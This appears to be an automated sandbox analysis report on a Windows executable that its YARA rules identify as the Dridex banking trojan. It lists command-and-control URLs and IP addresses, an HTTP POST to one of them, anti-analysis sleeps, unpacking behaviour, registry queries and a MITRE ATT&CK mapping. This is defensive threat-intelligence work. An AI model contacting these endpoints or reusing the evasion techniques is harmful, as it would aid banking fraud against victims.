Source: K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444272579.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498872671.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437583136.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/a
Source: K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/a2
Source: K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/ication
Source: K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506114094.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.513180409.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356894421.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/l
Source: K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356894421.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/m3
Source: K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/r3
Source: K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/t
Source: K9jgh4owKk.exe, 00000000.00000002.511762640.0000000000895000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336787597.0000000000895000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/w
Source: K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/y
Source: K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://463.9.36.172/

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 103.9.36.172Content-Length: 4857Connection: CloseCache-Control: no-cache

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_004339F9 InternetReadFile,

0_2_004339F9

Source: unknown

HTTPS traffic detected: 103.9.36.172:443 -> 192.168.2.7:49757 version: TLS 1.2

Source: K9jgh4owKk.exe, 00000000.00000002.511245314.00000000007BA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 0.2.K9jgh4owKk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.K9jgh4owKk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.K9jgh4owKk.exe.22b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.K9jgh4owKk.exe.22b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.512470585.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Detected Dridex e-Banking trojan

Show sources

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_00405150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

0_2_00405150

Source: K9jgh4owKk.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00405150	0_2_00405150
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004167C8	0_2_004167C8
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00421020	0_2_00421020
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041D030	0_2_0041D030
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004188C0	0_2_004188C0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00418CC0	0_2_00418CC0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0040ACD0	0_2_0040ACD0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041A0D0	0_2_0041A0D0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004198DA	0_2_004198DA
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041E0A0	0_2_0041E0A0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0042DCA0	0_2_0042DCA0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004250A0	0_2_004250A0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00424CA0	0_2_00424CA0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00425CB0	0_2_00425CB0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00417564	0_2_00417564
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00401570	0_2_00401570
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041FDD0	0_2_0041FDD0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004289F0	0_2_004289F0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004271F0	0_2_004271F0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041D980	0_2_0041D980
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0042D180	0_2_0042D180
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041C590	0_2_0041C590
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0040F9A0	0_2_0040F9A0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00421240	0_2_00421240
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041A660	0_2_0041A660
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00427660	0_2_00427660
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00422E60	0_2_00422E60
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00409E70	0_2_00409E70
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00419E70	0_2_00419E70
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0040CA10	0_2_0040CA10
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0042FA10	0_2_0042FA10
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00420220	0_2_00420220
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0042D620	0_2_0042D620
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00423EC0	0_2_00423EC0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0042FA10	0_2_0042FA10
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00406AD0	0_2_00406AD0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004196D0	0_2_004196D0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041F6E0	0_2_0041F6E0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041B6F0	0_2_0041B6F0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00418EF0	0_2_00418EF0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004262F0	0_2_004262F0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041AE80	0_2_0041AE80
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00418AB0	0_2_00418AB0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00421EB0	0_2_00421EB0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004226B0	0_2_004226B0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041BF50	0_2_0041BF50
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00415B60	0_2_00415B60
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00423B00	0_2_00423B00
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00429B10	0_2_00429B10
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00421730	0_2_00421730
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004183C0	0_2_004183C0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00417FC0	0_2_00417FC0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_00427FC0	0_2_00427FC0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0041E3F0	0_2_0041E3F0

Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_004122A0 NtDelayExecution,		0_2_004122A0
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0042BE30 NtClose,		0_2_0042BE30

Source: K9jgh4owKk.exe, 00000000.00000002.511153036.00000000004A6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePropSchemasetip.exeX vs K9jgh4owKk.exe
Source: K9jgh4owKk.exe	Binary or memory string: OriginalFilenamePropSchemasetip.exeX vs K9jgh4owKk.exe

Source: K9jgh4owKk.exe	Virustotal: Detection: 60%
Source: K9jgh4owKk.exe	Metadefender: Detection: 25%
Source: K9jgh4owKk.exe	ReversingLabs: Detection: 60%

Source: K9jgh4owKk.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@1/2@0/3

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Unpacked PE file: 0.2.K9jgh4owKk.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Unpacked PE file: 0.2.K9jgh4owKk.exe.400000.0.unpack .text:ER;.rdata:R;.rdata2:W;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_02295B50 push edx; ret	0_2_02295CDE
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_022762ED pushad ; iretd	0_2_02276305
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_02257192 push dword ptr [ebp+ecx*8-49h]; retf	0_2_02257196
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0226F6ED push esi; ret	0_2_0226F6F7
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_0227FB94 push esi; ret	0_2_0227FBAB
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_022589BD push 00000369h; ret	0_2_02258A48
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_022589ED push 00000369h; ret	0_2_02258A48
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_02250EAF push esi; ret	0_2_02250EB4
Source: C:\Users\user\Desktop\K9jgh4owKk.exe	Code function: 0_2_02251D31 push FFFFFFD5h; ret	0_2_02251D38

Source: K9jgh4owKk.exe

Static PE information: section name: .rdata2

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -510000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -840000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -604000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -765000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -574000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -282000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -172000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -316000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -295000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -450000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -155000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -151000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -471000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -314000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -537000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -354000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -297000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -156000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -686000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -335000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -162000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -152000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -294000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -372000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -318000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -266000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -161000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -349000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -286000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -319000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -352000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -396000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -254000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -344000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -648000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -307000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -444000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -244000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -348000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -322000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -121000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -251000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -308000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -257000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -277000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -146000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -296000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -359000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -329000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -163000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -309000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -169000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\K9jgh4owKk.exe TID: 6776	Thread sleep time: -149000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_022688FD rdtsc

0_2_022688FD

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

0_2_00405150

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_00413930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_00413930

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_0042CEF8 FindFirstFileExW,

0_2_0042CEF8

Source: K9jgh4owKk.exe, 00000000.00000003.313760711.0000000000818000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511245314.00000000007BA000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.304456350.0000000000818000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335083462.0000000000818000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297554445.0000000000818000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511441277.0000000000818000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: K9jgh4owKk.exe, 00000000.00000003.335063439.00000000007FF000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511245314.00000000007BA000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.313733042.00000000007FF000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304444988.00000000007FF000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297540471.00000000007FF000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW!

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_022688FD rdtsc

0_2_022688FD

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_00416C50 KiUserExceptionDispatcher,LdrLoadDll,

0_2_00416C50

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Memory protected: page execute read | page execute and read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_00417A60 RtlAddVectoredExceptionHandler,

0_2_00417A60

Source: K9jgh4owKk.exe, 00000000.00000002.511928829.0000000000E40000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: K9jgh4owKk.exe, 00000000.00000002.511928829.0000000000E40000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: K9jgh4owKk.exe, 00000000.00000002.511928829.0000000000E40000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: K9jgh4owKk.exe, 00000000.00000002.511928829.0000000000E40000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\K9jgh4owKk.exe

Code function: 0_2_00412980 GetUserNameW,

0_2_00412980

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion1	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing2	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Network Configuration Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
